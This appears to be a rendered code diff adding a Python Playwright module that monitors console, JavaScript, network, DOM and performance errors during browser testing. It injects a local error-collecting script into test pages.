|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Error Detection & Monitoring
|
| 3 |
+
======================================================================
|
| 4 |
+
|
| 5 |
+
Advanced error detection and monitoring system that catches all types of errors
|
| 6 |
+
during testing including console errors, JavaScript errors, network errors, DOM errors,
|
| 7 |
+
and performance issues.
|
| 8 |
+
|
| 9 |
+
Author: Mejbaur Bahar Fagun
|
| 10 |
+
Role: Software Engineer in Test
|
| 11 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
+
import asyncio
|
| 15 |
+
import json
|
| 16 |
+
import time
|
| 17 |
+
from typing import List, Dict, Any, Optional, Callable
|
| 18 |
+
from playwright.async_api import Page, BrowserContext, CDPSession
|
| 19 |
+
from dataclasses import dataclass, field
|
| 20 |
+
from datetime import datetime
|
| 21 |
+
import logging
|
| 22 |
+
|
| 23 |
+
logger = logging.getLogger(__name__)
|
| 24 |
+
|
| 25 |
+
|
| 26 |
+
@dataclass
|
| 27 |
+
class ErrorInfo:
|
| 28 |
+
"""Information about an error that occurred."""
|
| 29 |
+
error_type: str
|
| 30 |
+
error_message: str
|
| 31 |
+
error_stack: str
|
| 32 |
+
timestamp: datetime
|
| 33 |
+
url: str
|
| 34 |
+
source: str # 'console', 'javascript', 'network', 'dom', 'performance'
|
| 35 |
+
severity: str # 'low', 'medium', 'high', 'critical'
|
| 36 |
+
context: Dict[str, Any] = field(default_factory=dict)
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
class ErrorMonitor:
|
| 40 |
+
"""Advanced error monitoring system."""
|
| 41 |
+
|
| 42 |
+
def __init__(self):
|
| 43 |
+
self.errors: List[ErrorInfo] = []
|
| 44 |
+
self.console_errors: List[ErrorInfo] = []
|
| 45 |
+
self.js_errors: List[ErrorInfo] = []
|
| 46 |
+
self.network_errors: List[ErrorInfo] = []
|
| 47 |
+
self.dom_errors: List[ErrorInfo] = []
|
| 48 |
+
self.performance_issues: List[ErrorInfo] = []
|
| 49 |
+
self.cdp_session: Optional[CDPSession] = None
|
| 50 |
+
self.monitoring_active = False
|
| 51 |
+
|
| 52 |
+
async def start_monitoring(self, page: Page) -> None:
|
| 53 |
+
"""Start comprehensive error monitoring."""
|
| 54 |
+
try:
|
| 55 |
+
self.monitoring_active = True
|
| 56 |
+
|
| 57 |
+
# Get CDP session for advanced monitoring
|
| 58 |
+
self.cdp_session = await page.context.new_cdp_session(page)
|
| 59 |
+
|
| 60 |
+
# Set up console error monitoring
|
| 61 |
+
await self._setup_console_monitoring()
|
| 62 |
+
|
| 63 |
+
# Set up JavaScript error monitoring
|
| 64 |
+
await self._setup_javascript_monitoring()
|
| 65 |
+
|
| 66 |
+
# Set up network error monitoring
|
| 67 |
+
await self._setup_network_monitoring()
|
| 68 |
+
|
| 69 |
+
# Set up DOM error monitoring
|
| 70 |
+
await self._setup_dom_monitoring()
|
| 71 |
+
|
| 72 |
+
# Set up performance monitoring
|
| 73 |
+
await self._setup_performance_monitoring()
|
| 74 |
+
|
| 75 |
+
# Inject error detection script
|
| 76 |
+
await self._inject_error_detection_script(page)
|
| 77 |
+
|
| 78 |
+
logger.info("🔍 Error monitoring started successfully")
|
| 79 |
+
|
| 80 |
+
except Exception as e:
|
| 81 |
+
logger.error(f"Failed to start error monitoring: {e}")
|
| 82 |
+
|
| 83 |
+
async def stop_monitoring(self) -> None:
|
| 84 |
+
"""Stop error monitoring."""
|
| 85 |
+
self.monitoring_active = False
|
| 86 |
+
if self.cdp_session:
|
| 87 |
+
try:
|
| 88 |
+
await self.cdp_session.detach()
|
| 89 |
+
except Exception as e:
|
| 90 |
+
logger.warning(f"Error detaching CDP session: {e}")
|
| 91 |
+
logger.info("🛑 Error monitoring stopped")
|
| 92 |
+
|
| 93 |
+
async def _setup_console_monitoring(self) -> None:
|
| 94 |
+
"""Set up console error monitoring."""
|
| 95 |
+
if not self.cdp_session:
|
| 96 |
+
return
|
| 97 |
+
|
| 98 |
+
try:
|
| 99 |
+
# Enable console domain
|
| 100 |
+
await self.cdp_session.send("Runtime.enable")
|
| 101 |
+
await self.cdp_session.send("Console.enable")
|
| 102 |
+
|
| 103 |
+
# Set up console message handler
|
| 104 |
+
self.cdp_session.on("Runtime.consoleAPICalled", self._handle_console_message)
|
| 105 |
+
self.cdp_session.on("Runtime.exceptionThrown", self._handle_runtime_exception)
|
| 106 |
+
|
| 107 |
+
except Exception as e:
|
| 108 |
+
logger.error(f"Failed to setup console monitoring: {e}")
|
| 109 |
+
|
| 110 |
+
async def _setup_javascript_monitoring(self) -> None:
|
| 111 |
+
"""Set up JavaScript error monitoring."""
|
| 112 |
+
if not self.cdp_session:
|
| 113 |
+
return
|
| 114 |
+
|
| 115 |
+
try:
|
| 116 |
+
# Enable runtime domain for JS errors
|
| 117 |
+
await self.cdp_session.send("Runtime.enable")
|
| 118 |
+
|
| 119 |
+
# Set up exception handler
|
| 120 |
+
self.cdp_session.on("Runtime.exceptionThrown", self._handle_javascript_exception)
|
| 121 |
+
|
| 122 |
+
except Exception as e:
|
| 123 |
+
logger.error(f"Failed to setup JavaScript monitoring: {e}")
|
| 124 |
+
|
| 125 |
+
async def _setup_network_monitoring(self) -> None:
|
| 126 |
+
"""Set up network error monitoring."""
|
| 127 |
+
if not self.cdp_session:
|
| 128 |
+
return
|
| 129 |
+
|
| 130 |
+
try:
|
| 131 |
+
# Enable network domain
|
| 132 |
+
await self.cdp_session.send("Network.enable")
|
| 133 |
+
|
| 134 |
+
# Set up network event handlers
|
| 135 |
+
self.cdp_session.on("Network.responseReceived", self._handle_network_response)
|
| 136 |
+
self.cdp_session.on("Network.loadingFailed", self._handle_network_failure)
|
| 137 |
+
self.cdp_session.on("Network.requestWillBeSent", self._handle_network_request)
|
| 138 |
+
|
| 139 |
+
except Exception as e:
|
| 140 |
+
logger.error(f"Failed to setup network monitoring: {e}")
|
| 141 |
+
|
| 142 |
+
async def _setup_dom_monitoring(self) -> None:
|
| 143 |
+
"""Set up DOM error monitoring."""
|
| 144 |
+
if not self.cdp_session:
|
| 145 |
+
return
|
| 146 |
+
|
| 147 |
+
try:
|
| 148 |
+
# Enable DOM domain
|
| 149 |
+
await self.cdp_session.send("DOM.enable")
|
| 150 |
+
|
| 151 |
+
# Set up DOM event handlers
|
| 152 |
+
self.cdp_session.on("DOM.documentUpdated", self._handle_dom_update)
|
| 153 |
+
|
| 154 |
+
except Exception as e:
|
| 155 |
+
logger.error(f"Failed to setup DOM monitoring: {e}")
|
| 156 |
+
|
| 157 |
+
async def _setup_performance_monitoring(self) -> None:
|
| 158 |
+
"""Set up performance monitoring."""
|
| 159 |
+
if not self.cdp_session:
|
| 160 |
+
return
|
| 161 |
+
|
| 162 |
+
try:
|
| 163 |
+
# Enable performance domain
|
| 164 |
+
await self.cdp_session.send("Performance.enable")
|
| 165 |
+
|
| 166 |
+
# Set up performance event handlers
|
| 167 |
+
self.cdp_session.on("Performance.metrics", self._handle_performance_metrics)
|
| 168 |
+
|
| 169 |
+
except Exception as e:
|
| 170 |
+
logger.error(f"Failed to setup performance monitoring: {e}")
|
| 171 |
+
|
| 172 |
+
async def _inject_error_detection_script(self, page: Page) -> None:
|
| 173 |
+
"""Inject comprehensive error detection script."""
|
| 174 |
+
error_detection_script = """
|
| 175 |
+
(function() {
|
| 176 |
+
// Store original error handlers
|
| 177 |
+
const originalError = window.onerror;
|
| 178 |
+
const originalUnhandledRejection = window.onunhandledrejection;
|
| 179 |
+
|
| 180 |
+
// Global error handler
|
| 181 |
+
window.onerror = function(message, source, lineno, colno, error) {
|
| 182 |
+
const errorInfo = {
|
| 183 |
+
type: 'javascript_error',
|
| 184 |
+
message: message,
|
| 185 |
+
source: source,
|
| 186 |
+
line: lineno,
|
| 187 |
+
column: colno,
|
| 188 |
+
stack: error ? error.stack : null,
|
| 189 |
+
timestamp: new Date().toISOString(),
|
| 190 |
+
url: window.location.href
|
| 191 |
+
};
|
| 192 |
+
|
| 193 |
+
// Send to monitoring system
|
| 194 |
+
if (window.fagunErrorMonitor) {
|
| 195 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 196 |
+
}
|
| 197 |
+
|
| 198 |
+
// Call original handler if it exists
|
| 199 |
+
if (originalError) {
|
| 200 |
+
return originalError.apply(this, arguments);
|
| 201 |
+
}
|
| 202 |
+
|
| 203 |
+
return false;
|
| 204 |
+
};
|
| 205 |
+
|
| 206 |
+
// Unhandled promise rejection handler
|
| 207 |
+
window.onunhandledrejection = function(event) {
|
| 208 |
+
const errorInfo = {
|
| 209 |
+
type: 'unhandled_promise_rejection',
|
| 210 |
+
message: event.reason ? event.reason.toString() : 'Unknown promise rejection',
|
| 211 |
+
stack: event.reason && event.reason.stack ? event.reason.stack : null,
|
| 212 |
+
timestamp: new Date().toISOString(),
|
| 213 |
+
url: window.location.href
|
| 214 |
+
};
|
| 215 |
+
|
| 216 |
+
// Send to monitoring system
|
| 217 |
+
if (window.fagunErrorMonitor) {
|
| 218 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 219 |
+
}
|
| 220 |
+
|
| 221 |
+
// Call original handler if it exists
|
| 222 |
+
if (originalUnhandledRejection) {
|
| 223 |
+
return originalUnhandledRejection.apply(this, arguments);
|
| 224 |
+
}
|
| 225 |
+
};
|
| 226 |
+
|
| 227 |
+
// Monitor console errors
|
| 228 |
+
const originalConsoleError = console.error;
|
| 229 |
+
console.error = function(...args) {
|
| 230 |
+
const errorInfo = {
|
| 231 |
+
type: 'console_error',
|
| 232 |
+
message: args.join(' '),
|
| 233 |
+
timestamp: new Date().toISOString(),
|
| 234 |
+
url: window.location.href
|
| 235 |
+
};
|
| 236 |
+
|
| 237 |
+
// Send to monitoring system
|
| 238 |
+
if (window.fagunErrorMonitor) {
|
| 239 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 240 |
+
}
|
| 241 |
+
|
| 242 |
+
// Call original console.error
|
| 243 |
+
return originalConsoleError.apply(this, args);
|
| 244 |
+
};
|
| 245 |
+
|
| 246 |
+
// Monitor console warnings
|
| 247 |
+
const originalConsoleWarn = console.warn;
|
| 248 |
+
console.warn = function(...args) {
|
| 249 |
+
const errorInfo = {
|
| 250 |
+
type: 'console_warning',
|
| 251 |
+
message: args.join(' '),
|
| 252 |
+
timestamp: new Date().toISOString(),
|
| 253 |
+
url: window.location.href
|
| 254 |
+
};
|
| 255 |
+
|
| 256 |
+
// Send to monitoring system
|
| 257 |
+
if (window.fagunErrorMonitor) {
|
| 258 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 259 |
+
}
|
| 260 |
+
|
| 261 |
+
// Call original console.warn
|
| 262 |
+
return originalConsoleWarn.apply(this, args);
|
| 263 |
+
};
|
| 264 |
+
|
| 265 |
+
// Monitor resource loading errors
|
| 266 |
+
window.addEventListener('error', function(event) {
|
| 267 |
+
if (event.target !== window) {
|
| 268 |
+
const errorInfo = {
|
| 269 |
+
type: 'resource_error',
|
| 270 |
+
message: `Failed to load ${event.target.tagName}: ${event.target.src || event.target.href}`,
|
| 271 |
+
element: event.target.tagName,
|
| 272 |
+
source: event.target.src || event.target.href,
|
| 273 |
+
timestamp: new Date().toISOString(),
|
| 274 |
+
url: window.location.href
|
| 275 |
+
};
|
| 276 |
+
|
| 277 |
+
// Send to monitoring system
|
| 278 |
+
if (window.fagunErrorMonitor) {
|
| 279 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 280 |
+
}
|
| 281 |
+
}
|
| 282 |
+
}, true);
|
| 283 |
+
|
| 284 |
+
// Monitor network errors
|
| 285 |
+
const originalFetch = window.fetch;
|
| 286 |
+
window.fetch = function(...args) {
|
| 287 |
+
return originalFetch.apply(this, args).catch(error => {
|
| 288 |
+
const errorInfo = {
|
| 289 |
+
type: 'fetch_error',
|
| 290 |
+
message: error.message,
|
| 291 |
+
url: args[0],
|
| 292 |
+
timestamp: new Date().toISOString(),
|
| 293 |
+
currentUrl: window.location.href
|
| 294 |
+
};
|
| 295 |
+
|
| 296 |
+
// Send to monitoring system
|
| 297 |
+
if (window.fagunErrorMonitor) {
|
| 298 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 299 |
+
}
|
| 300 |
+
|
| 301 |
+
throw error;
|
| 302 |
+
});
|
| 303 |
+
};
|
| 304 |
+
|
| 305 |
+
// Monitor XMLHttpRequest errors
|
| 306 |
+
const originalXHROpen = XMLHttpRequest.prototype.open;
|
| 307 |
+
XMLHttpRequest.prototype.open = function(method, url, ...args) {
|
| 308 |
+
this._fagunUrl = url;
|
| 309 |
+
return originalXHROpen.apply(this, [method, url, ...args]);
|
| 310 |
+
};
|
| 311 |
+
|
| 312 |
+
const originalXHRSend = XMLHttpRequest.prototype.send;
|
| 313 |
+
XMLHttpRequest.prototype.send = function(...args) {
|
| 314 |
+
this.addEventListener('error', function() {
|
| 315 |
+
const errorInfo = {
|
| 316 |
+
type: 'xhr_error',
|
| 317 |
+
message: 'XMLHttpRequest failed',
|
| 318 |
+
url: this._fagunUrl,
|
| 319 |
+
timestamp: new Date().toISOString(),
|
| 320 |
+
currentUrl: window.location.href
|
| 321 |
+
};
|
| 322 |
+
|
| 323 |
+
// Send to monitoring system
|
| 324 |
+
if (window.fagunErrorMonitor) {
|
| 325 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 326 |
+
}
|
| 327 |
+
});
|
| 328 |
+
|
| 329 |
+
return originalXHRSend.apply(this, args);
|
| 330 |
+
};
|
| 331 |
+
|
| 332 |
+
// Monitor performance issues
|
| 333 |
+
const observer = new PerformanceObserver((list) => {
|
| 334 |
+
for (const entry of list.getEntries()) {
|
| 335 |
+
if (entry.entryType === 'measure' && entry.duration > 1000) {
|
| 336 |
+
const errorInfo = {
|
| 337 |
+
type: 'performance_issue',
|
| 338 |
+
message: `Slow operation: ${entry.name} took ${entry.duration}ms`,
|
| 339 |
+
duration: entry.duration,
|
| 340 |
+
timestamp: new Date().toISOString(),
|
| 341 |
+
url: window.location.href
|
| 342 |
+
};
|
| 343 |
+
|
| 344 |
+
// Send to monitoring system
|
| 345 |
+
if (window.fagunErrorMonitor) {
|
| 346 |
+
window.fagunErrorMonitor.reportError(errorInfo);
|
| 347 |
+
}
|
| 348 |
+
}
|
| 349 |
+
}
|
| 350 |
+
});
|
| 351 |
+
|
| 352 |
+
observer.observe({ entryTypes: ['measure', 'navigation', 'resource'] });
|
| 353 |
+
|
| 354 |
+
// Create error monitor object
|
| 355 |
+
window.fagunErrorMonitor = {
|
| 356 |
+
errors: [],
|
| 357 |
+
reportError: function(errorInfo) {
|
| 358 |
+
this.errors.push(errorInfo);
|
| 359 |
+
console.log('Fagun Error Monitor:', errorInfo);
|
| 360 |
+
},
|
| 361 |
+
getErrors: function() {
|
| 362 |
+
return this.errors;
|
| 363 |
+
},
|
| 364 |
+
clearErrors: function() {
|
| 365 |
+
this.errors = [];
|
| 366 |
+
}
|
| 367 |
+
};
|
| 368 |
+
|
| 369 |
+
console.log('Fagun Error Monitor initialized');
|
| 370 |
+
})();
|
| 371 |
+
"""
|
| 372 |
+
|
| 373 |
+
try:
|
| 374 |
+
await page.add_init_script(error_detection_script)
|
| 375 |
+
logger.info("🔍 Error detection script injected successfully")
|
| 376 |
+
except Exception as e:
|
| 377 |
+
logger.error(f"Failed to inject error detection script: {e}")
|
| 378 |
+
|
| 379 |
+
def _handle_console_message(self, event: Dict[str, Any]) -> None:
|
| 380 |
+
"""Handle console messages."""
|
| 381 |
+
try:
|
| 382 |
+
if event.get('type') in ['error', 'warning']:
|
| 383 |
+
error_info = ErrorInfo(
|
| 384 |
+
error_type=event.get('type', 'unknown'),
|
| 385 |
+
error_message=event.get('args', [{}])[0].get('value', 'Unknown console message'),
|
| 386 |
+
error_stack='',
|
| 387 |
+
timestamp=datetime.now(),
|
| 388 |
+
url='',
|
| 389 |
+
source='console',
|
| 390 |
+
severity='medium' if event.get('type') == 'warning' else 'high',
|
| 391 |
+
context={'console_event': event}
|
| 392 |
+
)
|
| 393 |
+
self.console_errors.append(error_info)
|
| 394 |
+
self.errors.append(error_info)
|
| 395 |
+
logger.warning(f"Console {event.get('type')}: {error_info.error_message}")
|
| 396 |
+
except Exception as e:
|
| 397 |
+
logger.error(f"Error handling console message: {e}")
|
| 398 |
+
|
| 399 |
+
def _handle_runtime_exception(self, event: Dict[str, Any]) -> None:
|
| 400 |
+
"""Handle runtime exceptions."""
|
| 401 |
+
try:
|
| 402 |
+
exception_details = event.get('exceptionDetails', {})
|
| 403 |
+
error_info = ErrorInfo(
|
| 404 |
+
error_type='runtime_exception',
|
| 405 |
+
error_message=exception_details.get('text', 'Unknown runtime exception'),
|
| 406 |
+
error_stack=exception_details.get('stackTrace', {}).get('callFrames', []),
|
| 407 |
+
timestamp=datetime.now(),
|
| 408 |
+
url='',
|
| 409 |
+
source='javascript',
|
| 410 |
+
severity='high',
|
| 411 |
+
context={'exception_details': exception_details}
|
| 412 |
+
)
|
| 413 |
+
self.js_errors.append(error_info)
|
| 414 |
+
self.errors.append(error_info)
|
| 415 |
+
logger.error(f"Runtime exception: {error_info.error_message}")
|
| 416 |
+
except Exception as e:
|
| 417 |
+
logger.error(f"Error handling runtime exception: {e}")
|
| 418 |
+
|
| 419 |
+
def _handle_javascript_exception(self, event: Dict[str, Any]) -> None:
|
| 420 |
+
"""Handle JavaScript exceptions."""
|
| 421 |
+
try:
|
| 422 |
+
exception_details = event.get('exceptionDetails', {})
|
| 423 |
+
error_info = ErrorInfo(
|
| 424 |
+
error_type='javascript_exception',
|
| 425 |
+
error_message=exception_details.get('text', 'Unknown JavaScript exception'),
|
| 426 |
+
error_stack=exception_details.get('stackTrace', {}).get('callFrames', []),
|
| 427 |
+
timestamp=datetime.now(),
|
| 428 |
+
url='',
|
| 429 |
+
source='javascript',
|
| 430 |
+
severity='high',
|
| 431 |
+
context={'exception_details': exception_details}
|
| 432 |
+
)
|
| 433 |
+
self.js_errors.append(error_info)
|
| 434 |
+
self.errors.append(error_info)
|
| 435 |
+
logger.error(f"JavaScript exception: {error_info.error_message}")
|
| 436 |
+
except Exception as e:
|
| 437 |
+
logger.error(f"Error handling JavaScript exception: {e}")
|
| 438 |
+
|
| 439 |
+
def _handle_network_response(self, event: Dict[str, Any]) -> None:
|
| 440 |
+
"""Handle network responses."""
|
| 441 |
+
try:
|
| 442 |
+
response = event.get('response', {})
|
| 443 |
+
status = response.get('status', 0)
|
| 444 |
+
|
| 445 |
+
if status >= 400:
|
| 446 |
+
error_info = ErrorInfo(
|
| 447 |
+
error_type='network_error',
|
| 448 |
+
error_message=f"HTTP {status} error for {response.get('url', 'unknown URL')}",
|
| 449 |
+
error_stack='',
|
| 450 |
+
timestamp=datetime.now(),
|
| 451 |
+
url=response.get('url', ''),
|
| 452 |
+
source='network',
|
| 453 |
+
severity='high' if status >= 500 else 'medium',
|
| 454 |
+
context={'status': status, 'response': response}
|
| 455 |
+
)
|
| 456 |
+
self.network_errors.append(error_info)
|
| 457 |
+
self.errors.append(error_info)
|
| 458 |
+
logger.warning(f"Network error: {error_info.error_message}")
|
| 459 |
+
except Exception as e:
|
| 460 |
+
logger.error(f"Error handling network response: {e}")
|
| 461 |
+
|
| 462 |
+
def _handle_network_failure(self, event: Dict[str, Any]) -> None:
|
| 463 |
+
"""Handle network failures."""
|
| 464 |
+
try:
|
| 465 |
+
error_info = ErrorInfo(
|
| 466 |
+
error_type='network_failure',
|
| 467 |
+
error_message=f"Network failure: {event.get('errorText', 'Unknown network failure')}",
|
| 468 |
+
error_stack='',
|
| 469 |
+
timestamp=datetime.now(),
|
| 470 |
+
url=event.get('requestId', ''),
|
| 471 |
+
source='network',
|
| 472 |
+
severity='high',
|
| 473 |
+
context={'failure_event': event}
|
| 474 |
+
)
|
| 475 |
+
self.network_errors.append(error_info)
|
| 476 |
+
self.errors.append(error_info)
|
| 477 |
+
logger.error(f"Network failure: {error_info.error_message}")
|
| 478 |
+
except Exception as e:
|
| 479 |
+
logger.error(f"Error handling network failure: {e}")
|
| 480 |
+
|
| 481 |
+
def _handle_network_request(self, event: Dict[str, Any]) -> None:
|
| 482 |
+
"""Handle network requests."""
|
| 483 |
+
try:
|
| 484 |
+
request = event.get('request', {})
|
| 485 |
+
# Log request for debugging
|
| 486 |
+
logger.debug(f"Network request: {request.get('method', 'GET')} {request.get('url', '')}")
|
| 487 |
+
except Exception as e:
|
| 488 |
+
logger.error(f"Error handling network request: {e}")
|
| 489 |
+
|
| 490 |
+
def _handle_dom_update(self, event: Dict[str, Any]) -> None:
|
| 491 |
+
"""Handle DOM updates."""
|
| 492 |
+
try:
|
| 493 |
+
# Monitor for DOM-related issues
|
| 494 |
+
logger.debug("DOM document updated")
|
| 495 |
+
except Exception as e:
|
| 496 |
+
logger.error(f"Error handling DOM update: {e}")
|
| 497 |
+
|
| 498 |
+
def _handle_performance_metrics(self, event: Dict[str, Any]) -> None:
|
| 499 |
+
"""Handle performance metrics."""
|
| 500 |
+
try:
|
| 501 |
+
metrics = event.get('metrics', [])
|
| 502 |
+
for metric in metrics:
|
| 503 |
+
if metric.get('name') == 'TaskDuration' and metric.get('value', 0) > 1000:
|
| 504 |
+
error_info = ErrorInfo(
|
| 505 |
+
error_type='performance_issue',
|
| 506 |
+
error_message=f"Slow task detected: {metric.get('value', 0)}ms",
|
| 507 |
+
error_stack='',
|
| 508 |
+
timestamp=datetime.now(),
|
| 509 |
+
url='',
|
| 510 |
+
source='performance',
|
| 511 |
+
severity='medium',
|
| 512 |
+
context={'metric': metric}
|
| 513 |
+
)
|
| 514 |
+
self.performance_issues.append(error_info)
|
| 515 |
+
self.errors.append(error_info)
|
| 516 |
+
logger.warning(f"Performance issue: {error_info.error_message}")
|
| 517 |
+
except Exception as e:
|
| 518 |
+
logger.error(f"Error handling performance metrics: {e}")
|
| 519 |
+
|
| 520 |
+
async def get_injected_errors(self, page: Page) -> List[ErrorInfo]:
|
| 521 |
+
"""Get errors from the injected error detection script."""
|
| 522 |
+
try:
|
| 523 |
+
errors = await page.evaluate("""
|
| 524 |
+
() => {
|
| 525 |
+
if (window.fagunErrorMonitor) {
|
| 526 |
+
return window.fagunErrorMonitor.getErrors();
|
| 527 |
+
}
|
| 528 |
+
return [];
|
| 529 |
+
}
|
| 530 |
+
""")
|
| 531 |
+
|
| 532 |
+
error_infos = []
|
| 533 |
+
for error in errors:
|
| 534 |
+
error_info = ErrorInfo(
|
| 535 |
+
error_type=error.get('type', 'unknown'),
|
| 536 |
+
error_message=error.get('message', 'Unknown error'),
|
| 537 |
+
error_stack=error.get('stack', ''),
|
| 538 |
+
timestamp=datetime.fromisoformat(error.get('timestamp', datetime.now().isoformat())),
|
| 539 |
+
url=error.get('url', ''),
|
| 540 |
+
source='injected_script',
|
| 541 |
+
severity=self._determine_severity(error.get('type', 'unknown')),
|
| 542 |
+
context={'injected_error': error}
|
| 543 |
+
)
|
| 544 |
+
error_infos.append(error_info)
|
| 545 |
+
|
| 546 |
+
return error_infos
|
| 547 |
+
|
| 548 |
+
except Exception as e:
|
| 549 |
+
logger.error(f"Error getting injected errors: {e}")
|
| 550 |
+
return []
|
| 551 |
+
|
| 552 |
+
def _determine_severity(self, error_type: str) -> str:
|
| 553 |
+
"""Determine error severity based on type."""
|
| 554 |
+
severity_map = {
|
| 555 |
+
'javascript_error': 'high',
|
| 556 |
+
'unhandled_promise_rejection': 'high',
|
| 557 |
+
'console_error': 'medium',
|
| 558 |
+
'console_warning': 'low',
|
| 559 |
+
'resource_error': 'medium',
|
| 560 |
+
'fetch_error': 'medium',
|
| 561 |
+
'xhr_error': 'medium',
|
| 562 |
+
'performance_issue': 'low',
|
| 563 |
+
'network_error': 'high',
|
| 564 |
+
'network_failure': 'high'
|
| 565 |
+
}
|
| 566 |
+
return severity_map.get(error_type, 'medium')
|
| 567 |
+
|
| 568 |
+
def get_all_errors(self) -> List[ErrorInfo]:
|
| 569 |
+
"""Get all collected errors."""
|
| 570 |
+
return self.errors
|
| 571 |
+
|
| 572 |
+
def get_errors_by_type(self, error_type: str) -> List[ErrorInfo]:
|
| 573 |
+
"""Get errors by type."""
|
| 574 |
+
return [error for error in self.errors if error.error_type == error_type]
|
| 575 |
+
|
| 576 |
+
def get_errors_by_severity(self, severity: str) -> List[ErrorInfo]:
|
| 577 |
+
"""Get errors by severity."""
|
| 578 |
+
return [error for error in self.errors if error.severity == severity]
|
| 579 |
+
|
| 580 |
+
def get_error_summary(self) -> Dict[str, Any]:
|
| 581 |
+
"""Get error summary statistics."""
|
| 582 |
+
total_errors = len(self.errors)
|
| 583 |
+
errors_by_type = {}
|
| 584 |
+
errors_by_severity = {}
|
| 585 |
+
|
| 586 |
+
for error in self.errors:
|
| 587 |
+
# Count by type
|
| 588 |
+
errors_by_type[error.error_type] = errors_by_type.get(error.error_type, 0) + 1
|
| 589 |
+
|
| 590 |
+
# Count by severity
|
| 591 |
+
errors_by_severity[error.severity] = errors_by_severity.get(error.severity, 0) + 1
|
| 592 |
+
|
| 593 |
+
return {
|
| 594 |
+
'total_errors': total_errors,
|
| 595 |
+
'errors_by_type': errors_by_type,
|
| 596 |
+
'errors_by_severity': errors_by_severity,
|
| 597 |
+
'console_errors': len(self.console_errors),
|
| 598 |
+
'js_errors': len(self.js_errors),
|
| 599 |
+
'network_errors': len(self.network_errors),
|
| 600 |
+
'dom_errors': len(self.dom_errors),
|
| 601 |
+
'performance_issues': len(self.performance_issues)
|
| 602 |
+
}
|
| 603 |
+
|
| 604 |
+
def clear_errors(self) -> None:
|
| 605 |
+
"""Clear all collected errors."""
|
| 606 |
+
self.errors.clear()
|
| 607 |
+
self.console_errors.clear()
|
| 608 |
+
self.js_errors.clear()
|
| 609 |
+
self.network_errors.clear()
|
| 610 |
+
self.dom_errors.clear()
|
| 611 |
+
self.performance_issues.clear()
|
| 612 |
+
|
| 613 |
+
|
| 614 |
+
# Global error monitor instance
|
| 615 |
+
error_monitor = ErrorMonitor()
|
src/utils/html_report_generator.py
ADDED
|
@@ -0,0 +1,212 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
